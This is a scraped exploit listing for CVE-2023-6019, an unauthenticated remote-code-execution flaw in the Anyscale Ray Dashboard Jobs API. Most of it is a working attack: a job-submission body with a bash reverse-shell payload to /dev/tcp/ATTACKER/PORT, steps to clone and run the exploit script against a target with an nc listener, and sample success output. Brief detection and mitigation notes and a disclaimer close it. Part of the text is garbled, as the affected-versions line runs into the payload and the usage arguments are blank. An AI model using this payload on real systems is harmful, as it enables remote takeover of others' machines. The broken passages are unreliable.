Exploit for OS Command Injection in Ray_Project Ray CVE-2023-6019

## https://sploitus.com/exploit?id=B7F3888A-67A2-5DAE-904A-1F178F5B69DD
# CVE-2023-6019 - Anyscale Ray Dashboard Unauthenticated RCE

> PoC exploit for CVE-2023-6019 — Remote Code Execution via unauthenticated Ray Dashboard Jobs API.  
> Made by **oguiii**

---

## Description

[Anyscale Ray](https://www.ray.io/) is an open-source framework for distributed ML/AI workloads. Versions **prior to 2.6.4** expose a Jobs submission API through the Ray Dashboard (default port `8265`) **without any authentication**, allowing an unauthenticated attacker to submit arbitrary jobs and achieve **Remote Code Execution** on the host.

- **CVE:** CVE-2023-6019  
- **Severity:** Critical (CVSS 9.8)  
- **Affected versions:** Ray :8265
Content-Type: application/json

{
  "entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'",
  "runtime_env": {},
  "job_id": null,
  "metadata": {}
}
```

---

## Usage

```bash
git clone https://github.com/joaquinrrr/CVE-2023-6019
cd CVE-2023-6019
pip install requests
python3 CVE-2023-6019.py -t  -p  -l  -lp 
```

### Arguments

| Flag | Description | Default |
|------|-------------|---------|
| `-t` | Target IP or hostname | required |
| `-p` | Ray Dashboard port | `8265` |
| `-l` | Attacker IP (reverse shell) | required |
| `-lp` | Attacker port (reverse shell) | required |

### Example

```bash
# Start listener
nc -lvnp 4444

# Run exploit
python3 CVE-2023-6019.py -t 192.168.1.100 -p 8265 -l 192.168.1.10 -lp 4444
```

### Expected output

```
[*] Checking Ray version at 192.168.1.100:8265...
[*] Ray API version : 4
[*] Ray version     : 2.6.3
[+] VULNERABLE! Ray 2.6.3 is affected by CVE-2023-6019

[*] Target        : http://192.168.1.100:8265/api/jobs/
[*] Reverse shell : 192.168.1.10:4444
[*] Submitting job...

[+] Job submitted successfully!
[+] Job ID: raysubmit_Gztg89LZuTa8Jevc

[>] Make sure your listener is ready:
    nc -lvnp 4444
```

---

## Detection

Look for unexpected POST requests to `/api/jobs/` on port `8265` in your HTTP logs or network traffic.

---

## Mitigation

- Upgrade to **Ray >= 2.6.4**
- Restrict access to the Ray Dashboard port (8265) via firewall rules
- Do not expose Ray Dashboard to public networks

---

## References

- https://nvd.nist.gov/vuln/detail/CVE-2023-6019
- https://www.anyscale.com/
- https://github.com/ray-project/ray

---

## Disclaimer

> This tool is intended for **authorized penetration testing and educational purposes only**.  
> The author is not responsible for any misuse or damage caused by this tool.  
> Always obtain proper written authorization before testing.